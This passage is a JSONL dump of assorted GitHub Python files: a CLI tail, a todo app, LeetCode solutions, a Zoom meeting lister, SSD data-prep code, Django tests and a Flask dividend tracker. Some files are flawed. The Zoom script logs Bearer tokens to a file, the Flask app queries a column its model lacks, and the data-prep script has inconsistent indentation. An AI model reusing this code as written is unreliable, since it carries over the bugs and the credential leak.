files\" option was chosen\n        if args.destination == \"txt\":\n            # Let the user know what we are attempting\n            print(\n                f\"Attempting to archive plays from {START_DATE.strftime('%Y-%m-%d')} to {END_DATE.strftime('%Y-%m-%d')} to text files.\"\n            )\n\n            # Import the necessary functions\n            from .grrif_archiver import plays_to_txt\n\n            # Write the text files\n            plays_to_txt(BASE_URL, START_DATE, END_DATE)\n\n        # The 
\"output data to stdout\" option was chosen\n if args.destination == \"print\":\n # Let the user know what we are attempting\n print(\n f\"Attempting to print plays from {START_DATE.strftime('%Y-%m-%d')} to {END_DATE.strftime('%Y-%m-%d')} to stdout.\"\n )\n\n # Import the necessary functions\n from .grrif_archiver import plays_to_stdout\n\n # Create/open the database\n plays_to_stdout(BASE_URL, START_DATE, END_DATE)\n\n # Stats was passed !\n if args.command == \"stats\":\n # Import the necessary functions\n from .grrif_stats import topofthepop\n\n if args.stats_command == \"artists\":\n if args.topofthepop == \"top10\":\n topofthepop(\"artist\", \"10\", START_DATE, END_DATE)\n if args.topofthepop == \"top25\":\n topofthepop(\"artist\", \"25\", START_DATE, END_DATE)\n if args.topofthepop == \"top100\":\n topofthepop(\"artist\", \"100\", START_DATE, END_DATE)\n\n if args.stats_command == \"tracks\":\n if args.topofthepop == \"top10\":\n topofthepop(\"artist, title\", \"10\", START_DATE, END_DATE)\n if args.topofthepop == \"top25\":\n topofthepop(\"artist, title\", \"25\", START_DATE, END_DATE)\n if args.topofthepop == \"top100\":\n topofthepop(\"title\", \"100\", START_DATE, END_DATE)\n\n # Scrobble was passed !\n if args.command == \"scrobble\":\n\n if args.scrobble_command == \"settings\":\n if args.API_KEY is not None and args.API_SECRET is not None and args.SESSION_KEY is not None:\n # Write the settings to file\n import os\n current_path = os.path.dirname(os.path.abspath(__file__))\n settings_path = os.path.join(current_path, \"grrif_secrets.py\")\n settings_content = f\"API_KEY = '{args.API_KEY}'\\nAPI_SECRET = '{args.API_SECRET}'\\nSESSION_KEY = '{args.SESSION_KEY}'\\n\"\n with open(settings_path, \"w\") as settings_file:\n settings_file.write(settings_content)\n else:\n print(\"Invalid number of arguments passed, API Key, API Secret and Session Key are needed.\")\n\n if args.scrobble_command == \"start\":\n from .grrif_scrobbler import start_scrobbling\n start_scrobbling(\"0\")\n\n # Play was passed !\n if args.command == \"play\":\n from .grrif_player import start_playback\n start_playback(args.quality)\n ","repo_name":"fetzu/grrif_tools","sub_path":"grrif_tools/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28536494602","text":"import argparse\nimport sys\nimport os\nimport sqlite3\nfrom datetime import datetime\n\ndef find_project_directory():\n current_dir = os.path.abspath(os.getcwd())\n while current_dir != os.path.dirname(current_dir):\n if os.path.isdir(os.path.join(current_dir, \".git\")):\n if os.stat(os.path.join(current_dir, \".git\")).st_uid == os.getuid():\n return current_dir\n current_dir = os.path.dirname(current_dir)\n return None\n\ndef get_database_path():\n project_dir = find_project_directory()\n if project_dir:\n return os.path.join(project_dir, \".todo.db\")\n return os.path.expanduser(\"~/.local/share/todo.db\")\n\ndef initialize_database(database_path):\n conn = sqlite3.connect(database_path)\n conn.execute('''CREATE TABLE IF NOT EXISTS todos\n (id INTEGER PRIMARY KEY, todo TEXT, created_at TIMESTAMP, done BOOLEAN)''')\n return conn\n\ndef print_todos(conn):\n for row in conn.execute(\"SELECT * FROM todos WHERE done = 0 ORDER BY created_at ASC\"):\n print(f\"{row[2]}: {row[1]}\")\n\ndef add_todo(conn, todo):\n conn.execute(\"INSERT INTO todos (todo, created_at, done) VALUES (?, ?, 0)\", (todo, datetime.now()))\n 
conn.commit()\n\ndef mark_done(conn, todo):\n conn.execute(\"UPDATE todos SET done = 1 WHERE todo = ? AND done = 0\", (todo,))\n conn.commit()\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"A simple command line todo app.\")\n parser.add_argument(\"todo\", nargs=\"*\", help=\"The todo to be added or marked as done.\")\n parser.add_argument(\"--done\", action=\"store_true\", help=\"Mark a todo as done.\")\n return parser.parse_args()\n\ndef main():\n args = parse_arguments()\n\n database_path = get_database_path()\n conn = initialize_database(database_path)\n \n if args.done:\n if args.todo:\n mark_done(conn, \" \".join(args.todo))\n else:\n print(\"Usage: todo.py --done \\\"TODO text\\\"\")\n elif args.todo:\n add_todo(conn, \" \".join(args.todo))\n else:\n print_todos(conn)\n\n conn.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mortehu/shellutils","sub_path":"shellutils/todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12405204982","text":"from typing import Optional\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n \"\"\"\n Given the root of a binary search tree, and an integer k,\n return the kth smallest value (1-indexed) of all the values of the nodes in the tree.\n \"\"\"\n stack = []\n curr = root\n #while stack is still nonempty or curr is not leaf\n while stack or curr:\n #while not leaf, iterate left to find smaller values (moving through left side of tree)\n while curr:\n #append to stack\n stack.append(curr)\n curr = curr.left\n #once hit leaf, pop stack to go back to value\n curr = stack.pop()\n #subtract k by 1\n k-= 1\n #if k == 0 (at kth smallest value), return k\n if k == 0:\n return curr.val\n #otherwise, continue iterating through tree\n curr = curr.right\n ","repo_name":"JamesAlexanderLeak/leetcodeProblems","sub_path":"230_Kth_Smallest_Element_in_a_BST.py","file_name":"230_Kth_Smallest_Element_in_a_BST.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22396055813","text":"import requests\nimport jwt\nimport json\nfrom datetime import datetime, timedelta\nimport logging\nimport time\n\n\"\"\"\nMore information on Zoom API's can be found at:\nAPI documentation\nhttps://marketplace.zoom.us/docs/api-reference/introduction\n\nSDK Documentation\nhttps://marketplace.zoom.us/docs/sdk/native-sdks/preface/introducing-zoom-sdk\n\nMarketplace Documentation\nhttps://marketplace.zoom.us/docs\n\nDeveloper Forum\nhttps://devforum.zoom.us/\n\nZoom Github\nhttps://github.com/zoom\n\"\"\"\n\n####################################\n# CONFIGURE VARIABLES #\n####################################\n\"\"\"\nChange the variables in this section using you API_KEY and SECRET from the Zoom Marketplace https://marketplace.zoom.us\nJWT_EXPIRY should be an Integer in seconds\nDO NOT change the base URL\n\"\"\"\nAPI_KEY = \"YOUR API KEY\"\nAPI_SECRET = \"YOUR API SECRET\"\nJWT_EXPIRY = 60\nBASE_URL = 'https://api.zoom.us/v2/'\n\n\n####################################\n# CONFIGURE LOGGING #\n####################################\n\"\"\"\nThis configuration will save a log file into the same folder as the *.py 
file\n\"\"\"\nlogging.basicConfig(filename='logfile.log',level=logging.DEBUG, format='%(levelname)s %(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\n\n###########################################\n# DO NOT CHANGE ANYTHING BELOW THIS LINE #\n###########################################\n\n# Function to create JWT Token\n\ndef jwt_token():\n exp_time = datetime.utcnow() + timedelta(seconds =JWT_EXPIRY)\n payload = {'iss' : API_KEY, 'exp' : exp_time}\n headers = {'alg' : 'HS256', 'typ' : 'JWT'}\n token = str(jwt.encode(headers = headers, payload = payload, key = API_SECRET, algorithm = 'HS256'), 'utf-8')\n return(token)\n\n# REQUEST FUNCTIONS\n\n\"\"\"\nGet JWT token, assemble headers, assemble endpoint URL, Log URL and Headers, send get request.\nIf status is not 200 log warning otherwise log response content as info\nreturn response content\n\"\"\"\ndef send_get_request(endpoint):\n token = jwt_token()\n headers = {\"authorization\" : \"Bearer %s\" % token, \"content-type\" : \"application/json\"}\n FINAL_URL = BASE_URL + endpoint\n logging.debug(\"'{0}', '{1}'\".format(FINAL_URL, headers))\n r = requests.get(FINAL_URL, headers = headers)\n if r.status_code != 200:\n logging.warning(\"'{0}'\".format(r.content))\n logging.info(\"'{0}'\".format(r.content))\n return r.content\n\n\n\ndef list_users():\n logging.info('list_users')\n url = '/users'\n user_list = []\n response = send_get_request(url)\n encoded_data=json.loads(response)\n for item in encoded_data['users']:\n user = item['id']\n user_list.append(user)\n return(user_list)\n\ndef get_meetings(userID):\n logging.info('get meetings: %s' % userID)\n url = '/users/%s/meetings' % userID\n response = send_get_request(url)\n return(response)\n\ndef get_all_meetings():\n logging.info('get all meetings')\n user_list = list_users()\n date_format = \"%Y-%m-%dT%H:%M:%SZ\"\n for user in user_list:\n meetings = get_meetings(user)\n encoded_data=json.loads(meetings)\n for item in encoded_data['meetings']:\n meeting_type = item['type']\n if meeting_type == '2':\n mstart_time = item['start_time']\n ftime = datetime.strptime(mstart_time, date_format)\n if ftime > datetime.now():\n print(item)\n time.sleep(.300)\n\nget_all_meetings()","repo_name":"shirus172/Zoom-v2-API-projects","sub_path":"list_upcoming_meetings.py","file_name":"list_upcoming_meetings.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36889966958","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def findDistance(self, root: Optional[TreeNode], p: int, q: int) -> int:\n \n def find_path_node(cur_root, target):\n if cur_root is None:\n return False, list()\n if cur_root.val == target:\n return True, [cur_root.val]\n \n lflag, lt = find_path_node(cur_root.left, target)\n if lflag:\n lt.append(cur_root.val)\n return True, lt\n rflag, rt = find_path_node(cur_root.right, target)\n if rflag:\n rt.append(cur_root.val)\n return True, rt\n \n return False, list()\n \n pflag, p_path = find_path_node(root, p)\n qflag, q_path = find_path_node(root, q)\n \n if p in q_path:\n indx = q_path.index(p)\n return indx\n \n if q in p_path:\n indx = p_path.index(q)\n return indx\n \n i = len(p_path) - 1\n j = len(q_path) - 1\n while p_path[i] == q_path[j]:\n i -= 1\n j -= 1\n return i + j + 
2","repo_name":"KushalSatrasala/PracticingCode","sub_path":"1740-find-distance-in-a-binary-tree/1740-find-distance-in-a-binary-tree.py","file_name":"1740-find-distance-in-a-binary-tree.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38897747825","text":"from traitlets import Instance, Float, Integer\nfrom common import ComponentBase, action\nfrom common.save import DataSaver\nfrom common.traits import DataSet as DataSetTrait\nfrom datasources.terak15 import TeraK15\n\nclass AppRoot(ComponentBase):\n\n dataSaver = Instance(DataSaver)\n terak15 = Instance(TeraK15)\n currentMeasurement = DataSetTrait().tag(name=\"Current measurement\",\n data_label=\"Amplitude\",\n axes_labels=[\"Time\"])\n\n progress = Float(0, min=0, max=1, read_only=True).tag(name=\"Progress\")\n nMeasurements = Integer(1, min=1).tag(name=\"No. of measurements\", priority=99)\n\n def __init__(self, objectName=None, loop=None):\n super().__init__(objectName=\"Measurement\", loop=loop)\n self.title = \"Taipan\"\n\n self.dataSaver = DataSaver(objectName=\"Data Saver\")\n self.terak15 = TeraK15(name_or_ip=\"192.168.134.80\", objectName=\"TeraK15\", loop=loop)\n\n async def __aenter__(self):\n await super().__aenter__()\n return self\n\n @action(\"Take measurements\")\n async def takeMeasurements(self):\n for i in range(self.nMeasurements):\n self.set_trait(\"progress\", i / self.nMeasurements)\n self.set_trait(\"currentMeasurement\", await self.terak15.readDataSet())\n self.dataSaver.process(self.currentMeasurement)\n\n self.set_trait(\"progress\", 1)\n\n\n async def __aexit__(self, *args):\n await super().__aexit__(*args)\n","repo_name":"Owlbearpig/taipan","sub_path":"taipan/terak15_standalone.py","file_name":"terak15_standalone.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18500957492","text":"from settings import *\nimport numpy as np\nfrom tfrecord_read_write import read_and_decode\nimport pickle\n\ndef calc_iou(box_a, box_b):\n \"\"\"\n\tCalculate the Intersection Over Union of two boxes\n\tEach box specified by upper left corner and lower right corner:\n\t(x1, y1, x2, y2), where 1 denotes upper left corner, 2 denotes lower right corner\n\n\tReturns IOU value\n\t\"\"\"\n\t# Calculate intersection, i.e. 
area of overlap between the 2 boxes (could be 0)\n\t# http://math.stackexchange.com/a/99576\n\t# x_overlap = max(0, min(r1.right, r2.right)-max(r1.left, r2.left))\n\t#y_overlap = max(0, min(r1.bottom, r2.bottom) - max(r1.top, r2.top))\n\t#overlapArea = x_overlap * y_overlap\n\n    # r1[right], r2[right]           r1[left], r2[left]\n    x_overlap = max(0, min(box_a[2], box_b[2]) - max(box_a[0], box_b[0]))\n\t\n\t# r1[bottom], r2[bottom]              r1[top], r2[top]\n    y_overlap = max(0, min(box_a[3], box_b[3]) - max(box_a[1], box_b[1]))\n    intersection = x_overlap * y_overlap # area of the overlapping region\n\n\t# Calculate union\n\t# area of box a = (r1.Right - r1.Left) * (r1.Bottom - r1.Top)\n    area_box_a = (box_a[2] - box_a[0]) * (box_a[3] - box_a[1])\n\n\t# area of box b = (r2.Right - r2.Left) * (r2.Bottom - r2.Top)\n    area_box_b = (box_b[2] - box_b[0]) * (box_b[3] - box_b[1])\n\t# (A xor B)=> r1 xor r2\n    union = area_box_a + area_box_b - intersection # area of the union (the overlap is counted once)\n\t\n    iou = np.divide(intersection , union, dtype=np.float) # IOU value of boxes a and b\n\t\n    return iou\n\ndef find_gt_boxes(image_file, tag, gt_bboxes):\n    \n    signs_class = []\n    signs_box_coords = [] \n    for i in range(int(len(gt_bboxes)/4)):\n        start_index, end_index = i*4, i*4+4\n        signs_class.append(tag)\n        scale = np.array([IMG_W, IMG_H, IMG_W, IMG_H])\n        box_coords = np.divide(np.array(gt_bboxes[start_index:end_index]),scale, dtype=np.float)\n        if(box_coords[0]==0. and box_coords[1]==0. and box_coords[2]==0. and box_coords[3]==0.):\n            continue\n        signs_box_coords.append(box_coords)\n\n    y_ture_len = 0\n    for fm_size in FM_SIZES:\n        y_ture_len += fm_size[0] * fm_size[1]* NUM_DEFAULT_BOXES\n    \n    y_true_conf = np.zeros(y_ture_len)\n    y_true_loc = np.zeros(y_ture_len*4)\n\n    match_counter = 0\n    for i, gt_box_coords in enumerate(signs_box_coords):\n        y_true_idx = 0\n\n        for fm_size in FM_SIZES:\n            fm_h, fm_w = fm_size\n            for row in range(fm_h):\n                for col in range(fm_w):\n                    for db in DEFAULT_BOXES:\n                        x1_offset, y1_offset, x2_offset, y2_offset = db\n                        abs_db_box_coords = np.array([\n\t\t\t\t\t\t\tmax(0, col + x1_offset),\n\t\t\t\t\t\t\tmax(0, row + y1_offset),\n\t\t\t\t\t\t\tmin(fm_w, col+1 + x2_offset),\n\t\t\t\t\t\t\tmin(fm_h, row+1 + y2_offset)\n\t\t\t\t\t\t])\n                        '''abs_db_box_coords = np.array([\n\t\t\t\t\t\t\tmax(0, col + col*x1_offset),\n\t\t\t\t\t\t\tmax(0, row + row*y1_offset),\n\t\t\t\t\t\t\tmin(fm_w, col+1 + col*x2_offset),\n\t\t\t\t\t\t\tmin(fm_h, row+1 + row*y2_offset)\n\t\t\t\t\t\t])'''\n                        scale = np.array([fm_w, fm_h, fm_w, fm_h])\n                        db_box_coords = np.divide(abs_db_box_coords , scale, dtype=np.float)\n                        if col==20 and row==20:\n                            stop_check_point=0\n                        iou = calc_iou(gt_box_coords, db_box_coords)\n\n                        if iou >= IOU_THRESH:\n       \t\t\t\t\t\t\t# Update y_true_conf to reflect we found a match, and increment match_counter\n                            y_true_conf[y_true_idx] = signs_class[i]\n                            match_counter += 1\n\n                            #print('(%d,%d)/'%(row,col))\n\n\t\t\t\t\t\t\t# Calculate normalized box coordinates and update y_true_loc\n                            abs_box_center = np.array([col + 0.5, row + 0.5]) # absolute coordinates of center of feature map cell\n                            abs_gt_box_coords = gt_box_coords * scale # absolute ground truth box coordinates (in feature map grid)\n                            norm_box_coords = abs_gt_box_coords - np.concatenate((abs_box_center, abs_box_center))\n                            y_true_loc[y_true_idx*4 : y_true_idx*4 + 4] = norm_box_coords\n\n                            y_true_idx += 1\n\n    return y_true_conf, y_true_loc, match_counter\n\ndef do_data_prep(): \n    data_prep = 
{}\n\n    filename_queue = tf.train.string_input_producer([TFRECORD_ADDRESS], num_epochs=1 )\n    image, tag, bboxes = read_and_decode(TFRECORD_ADDRESS, filename_queue)\n    init_op = tf.group(tf.global_variables_initializer(),\n                tf.local_variables_initializer())\n    \n    with tf.Session() as sess:\n        sess.run(init_op)\n        \n        coord = tf.train.Coordinator()\n        threads = tf.train.start_queue_runners(coord=coord)\n\n\n        for i in range(TOTAL_DATA_TO_READ_FROM_TFRECORD):\n            image_filename, label, gt_box_coords = sess.run([image, tag, bboxes]) #read_single_data_from_tfrecord(TFRECORD_ADDRESS)\n            y_true_conf, y_true_loc, match_counter = find_gt_boxes(image_filename, label, gt_box_coords)\n            if match_counter > 0:\n                data_prep[image_filename] = {'y_true_conf': y_true_conf, 'y_true_loc': y_true_loc}\n            print('%s/%s, match_numbers: %s'%(i,614, match_counter))\n    return data_prep\n\nif __name__ == '__main__':\n    data_prep = do_data_prep()\n\n    with open('data_prep_%sx%s.p'%(IMG_W, IMG_H), 'wb') as f:\n        pickle.dump(data_prep, f, protocol=2)\n    \n    print('Done. Saved prepared data to data_prep_%sx%s.p' % (IMG_W, IMG_H))\n    print('Total images with >=1 matching box: %d' % len(data_prep.keys()))","repo_name":"mortezamg63/TFRecord_CalTech_Pedestrian_Dataset","sub_path":"data_prep_INIRIA.py","file_name":"data_prep_INIRIA.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3410245631","text":"# This Python file uses the following encoding: utf-8\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nimport common.urllib_adaptor as urllib2\nfrom common.geo_calculations import distance_between_points\nfrom common.geocode import geocode, geohash_encode, geohash_decode\nfrom common.sms_notification import send_sms\nfrom common.route import calculate_time_and_distance\nfrom common.util import gen_verification_code\nimport logging\n\nclass GeocodeTest(TestCase):\n    \"\"\"\n    Geocoding unit test: geo coding, geo distance and geo hashing tests.\n    \"\"\"\n\n    def test_geo_coding(self):\n        \"\"\"\n        Check that geocoding returns at least one location with correct geocode,\n        i.e., country, city, street, house number, lon. and lat. are matching those of the query.\n        \"\"\"\n        test_data = (\n            {\"address\" : u\"דיזנגוף 99 תל אביב\",\n             \"country\" : u\"IL\",\n             \"city\" : u\"תל אביב יפו\",\n             \"street_address\" : u\"דיזנגוף\",\n             \"house_number\" : u\"99\",\n             \"lon\" : '34.77388',\n             \"lat\" : '32.07933',\n                },\n            {\"address\" : u\"מרג 1 תל אביב יפו\",\n             \"country\" : u\"IL\",\n             \"city\" : u\"תל אביב יפו\",\n             \"street_address\" : u\"מרגולין\",\n             \"house_number\" : u\"1\",\n             \"lon\" : '34.787368',\n             \"lat\" : '32.05856',\n                },\n            {\"address\" : u\"בן יהודה 35 ירושלים\",\n             \"country\" : u\"IL\",\n             \"city\" : u\"ירושלים\",\n             \"street_address\" : u\"אליעזר וחמדה בן יהודה\",\n             \"house_number\" : u\"35\",\n             \"lon\" : '35.214161',\n             \"lat\" : '31.780725',\n                },\n            )\n        \n        logging.info(\"\\nTesting geo coding\")\n        for test_case in test_data:\n            test_case_success = False\n\n            address = test_case[\"address\"]\n            logging.info(\"Testing geo coding for %s\" % address)\n            geo_code = geocode(address)\n            self.assertTrue(geo_code, msg=\"no geo code received for %s\" % address)\n\n            # geo_code may contain more than one location. 
Check that at least one is correct.\n            for location in geo_code:\n                location_success = True\n                logging.info(\"Processing location %s\" % location[\"description\"])\n\n                # textual properties, compare lowercase\n                for property in [\"country\", \"city\", \"street_address\", \"house_number\"]:\n                    result = \"OK\"\n                    if not test_case[property].lower() == location[property].lower():\n                        result = \"failed\"\n                        location_success = False\n                    #uncomment for debug since all Django tests run with DEBUG=False\n                    #logging.info(\"comparing %s: %s\" % (property, result))\n\n                # numerical properties, allowed to differ a bit.\n                precision = 0.001\n                result = \"OK\"\n                for property in [\"lon\", \"lat\"]:\n                    if not abs(float(test_case[property]) - float(location[property])) < precision:\n                        result = \"failed\"\n                        location_success = False\n                    #logging.info(\"comparing %s with precision %f: %s\" % (property, precision, result))\n\n                if location_success:\n                    logging.info(\"Found correct location at %s\" % location[\"description\"])\n                    test_case_success = True\n                    break\n\n            self.assertTrue(test_case_success, msg=\"correct geo code was not found for %s\" % address)\n\n\n    def test_geo_distance(self):\n        \"\"\"\n        Test geo distance calculation. Taken from Jan Matuschek's article.\n        \"\"\"\n        logging.info(\"\\nTesting geo distance liberty to eiffel\")\n        # distance is about 5837 km, check 3 decimal places\n        d = distance_between_points(40.6892, -74.0444, 48.8583, 2.2945)\n        expected_d = 5837.413\n        self.assertAlmostEqual(d, expected_d, places=3, msg=\"geo distance error %f (expected %f)\" % (d, expected_d))\n\n    def test_geo_hash(self):\n        \"\"\"\n        Simple geo hashing test.\n        \"\"\"\n        logging.info(\"\\nTesting geohash encode/decode.\")\n        points = ({\"lat\" :\"31.776933\",\n                   \"lon\" :\"35.234376\",\n                   \"hash_code\" :\"sv9hcbbfh3wu\"},\n                  {\"lat\" :\"21.424172\",\n                   \"lon\" :\"39.826112\",\n                   \"hash_code\" :\"sgu3fk0kzejk\"},\n                  )\n        for p in points:\n            self.assertEqual(geohash_encode(float(p[\"lon\"]),float(p[\"lat\"])), p[\"hash_code\"], msg=\"encode error\")\n            self.assertEqual(geohash_decode(p[\"hash_code\"]), (p[\"lat\"],p[\"lon\"]), msg=\"decode error\")\n\n\nclass RouteTest(TestCase):\n    \"\"\"\n    Unit test for route estimation (time and distance).\n    \"\"\"\n\n    def setUp(self):\n        # error margins to take into account traffic noise.\n        self.ERR_RATIO = 0.4\n\n        self.test_data = (\n            {\"p0\" : \"Yishayahu 60 Tel Aviv\",\n             \"p1\" : \"Rotschild 19 Tel Aviv\",\n             \"p0_lon\" : '34.78099',\n             \"p0_lat\" : '32.09307',\n             \"p1_lon\" : '34.77127',\n             \"p1_lat\" : '32.06355',\n             \"expected_t\" : '768',\n             \"expected_d\" : '4110'\n            },\n            {\"p0\" : \"Tarsish 17 Or Yehuda\",\n             \"p1\" : \"Margolin 15 Tel Aviv\",\n             \"p0_lon\" : '34.859405',\n             \"p0_lat\" : '32.028877',\n             \"p1_lon\" : '34.790611',\n             \"p1_lat\" : '32.05856',\n             \"expected_t\" : '900',\n             \"expected_d\" : '12000'\n            }\n        )\n\n    def test_calculate_time_and_distance(self):\n        for test_case in self.test_data:\n            logging.info(\"Testing route from %s (p0) to %s (p1)\" % (test_case[\"p0\"], test_case[\"p1\"]))\n            estimation = calculate_time_and_distance(test_case[\"p0_lon\"], test_case[\"p0_lat\"], test_case[\"p1_lon\"], test_case[\"p1_lat\"])\n\n            t, d = float(estimation[\"estimated_duration\"]), float(estimation[\"estimated_distance\"])\n            expected_t, expected_d = float(test_case[\"expected_t\"]), float(test_case[\"expected_d\"])\n\n            logging.info(\"Time received: %d (expected %d)\" % (t, expected_t))\n            self.assertTrue(1 - self.ERR_RATIO < t/expected_t < 1 + self.ERR_RATIO)\n\n            logging.info(\"Distance received: %d (expected %d)\" % (d, 
expected_d))\n            self.assertTrue(1 - self.ERR_RATIO < d/expected_d < 1 + self.ERR_RATIO)\n\n\nclass Urllib2AdaptorTest(TestCase):\n    def test_fetch_url(self):\n        content = urllib2.urlopen(\"http://www.google.com\")\n        self.assertTrue(\"google\" in str(content))\n\n    def test_content_read(self):\n        response = urllib2.urlopen(\"http://www.google.com\")\n        content = response.read()\n        self.assertTrue(\"google\" in content)\n\n    def test_request_headers(self):\n        mobile_str = \"mobile.twitter.com\"\n        url = \"http://www.twitter.com\"\n        request = urllib2.Request(url,\n                                  headers={\"USER_AGENT\": \"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/1A542a Safari/419.3\"})\n\n        content = urllib2.urlopen(request)\n        self.assertTrue(mobile_str in str(content))\n\n        request = urllib2.Request(url)\n        content = urllib2.urlopen(request)\n        self.assertTrue(mobile_str not in str(content))\n\n\nclass BasicFuncTest(TestCase):\n    \"\"\"\n    Test basic functionality provided by common app.\n    \"\"\"\n\n    fixtures = ['countries.yaml']\n    \n    def test_send_sms(self):\n        logging.info(\"\\nTesting sms sending\")\n        self.assertTrue(send_sms('0526342974', 'sms test'), msg=\"sms send failed\")\n\n    def test_code_generator(self):\n        logging.info(\"testing code generator\")\n        code1 = gen_verification_code()\n        code2 = gen_verification_code()\n        self.assertTrue(code1!=code2, \"same verification code is generated\")\n\n    def test_is_email_available(self):\n        logging.info(\"\\nTesting username available\")\n        from django.contrib.auth.models import User\n        test_user = User()\n        test_user.username = \"test_user1\"\n        test_user.email = \"test_user1@wayebtter.com\"\n        test_user.save()\n\n        response = self.client.get(reverse('common.services.is_email_available'), {\"email\": \"test_user1@wayebtter.com\"})\n        self.assertTrue(response.content == \"false\", msg=\"expected username unavailable\")\n\n        response = self.client.get(reverse('common.services.is_email_available'), {\"email\": \"test_user2@wayebtter.com\"})\n        self.assertTrue(response.content == \"true\", msg=\"expected username available\")\n\n","repo_name":"WAYbetter/waybetter","sub_path":"common/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31040795","text":"from app.services.steam.steam_api import SteamAPI\n\n\nclass SteamFriends:\n    \"\"\"Helps find friends of a steam user\"\"\"\n\n    def __init__(self) -> None:\n        self.steam_client = SteamAPI()\n\n    async def get_friends_with_include(self, steamid: int | str, include: list[str]) -> list[str]:\n        friends = await self.steam_client.get_player_friend_list(steamid)\n        friends_include = [friend for friend in friends if friend.steamid in include]\n        return [friend.steamid for friend in friends_include]\n\n    async def find_parties(self, steamids: list[str], include: list[str]) -> list[list[str]]:\n        parties: dict[str, set[str]] = {}\n        for steamid in steamids:\n            parties[steamid] = set(await self.get_friends_with_include(steamid, include))\n\n        remove_keys = []\n        for player_steamid, player_friends in parties.items():\n            for friend_steamid in player_friends:\n                if friend_steamid in remove_keys:\n                    continue\n                parties[player_steamid] = player_friends.union(parties[friend_steamid])\n                remove_keys.append(friend_steamid)\n\n        result = []\n        for owner, party in parties.items():\n            if not party or owner in remove_keys:\n                continue\n            result.append([owner, *party])\n\n        return 
result\n","repo_name":"MagicRustHelper/backend","sub_path":"app/services/steam/steam_friends.py","file_name":"steam_friends.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37575085747","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nimport pandas as pd\nimport numpy as np\nimport yfinance as yf\nfrom flask_dance.contrib.google import make_google_blueprint, google\n\n# Create the Flask app\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///portfolio.db'\napp.config['SECRET_KEY'] = 'secret-key-goes-here'\ndb = SQLAlchemy(app)\n\n# Define a list of stocks to analyze\nstocks = ['AAPL', 'MSFT', 'JNJ', 'VZ', 'T', 'KO', 'PEP', 'PG', 'MMM', 'XOM']\n\n# Configure Google OAuth\nblueprint = make_google_blueprint(client_id='client-id-goes-here', client_secret='client-secret-goes-here', offline=True, scope=['profile', 'email'])\napp.register_blueprint(blueprint, url_prefix='/login')\n\nclass Stock(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n symbol = db.Column(db.String(10), nullable=False)\n quantity = db.Column(db.Integer, nullable=False)\n cost_basis = db.Column(db.Float, nullable=False)\n\n# Define the routes\n@app.route(\"/\")\ndef index():\n # If the user is not logged in, redirect to the login page\n if not google.authorized:\n return redirect(url_for('google.login'))\n \n # Get the user's information from Google\n resp = google.get(\"/oauth2/v1/userinfo\")\n assert resp.ok, resp.text\n email = resp.json()['email']\n \n # Create an empty dataframe to store the stock data\n dividend_data = pd.DataFrame(columns=['Stock', 'Dividend Yield', 'Payout Ratio'])\n \n # Loop through the list of stocks, download the stock data from Yahoo Finance,\n # and calculate the dividend yield and payout ratio\n for stock in stocks:\n ticker = yf.Ticker(stock)\n data = ticker.history(period=\"max\")\n latest_close_price = data['Close'][-1]\n dividend = ticker.dividends\n dividend_yield = np.mean(dividend) / latest_close_price\n net_income = ticker.earnings\n payout_ratio = np.mean(dividend) / np.mean(net_income)\n dividend_data = dividend_data.append({'Stock': stock, 'Dividend Yield': dividend_yield, 'Payout Ratio': payout_ratio}, ignore_index=True)\n \n # Sort the dataframe by dividend yield and convert to HTML table\n dividend_data = dividend_data.sort_values(by=['Dividend Yield'], ascending=False)\n dividend_table = dividend_data.to_html(index=False)\n \n # Retrieve the list of stocks in the portfolio for the current user and calculate the total value\n portfolio = Stock.query.filter_by(email=email).all()\n portfolio_value = 0\n for stock in portfolio:\n ticker = yf.Ticker(stock.symbol)\n data = ticker.history(period=\"max\")\n latest_close_price = data['Close'][-1]\n stock_value = stock.quantity * latest_close_price\n portfolio_value += stock_value\n \n # Render the HTML template with the dividend table and portfolio\n return render_template('index.html', dividend_table=dividend_table, portfolio=portfolio, portfolio_value=portfolio_value)\n\n\nif __name__ == '__main__':\n db.create_all()\n 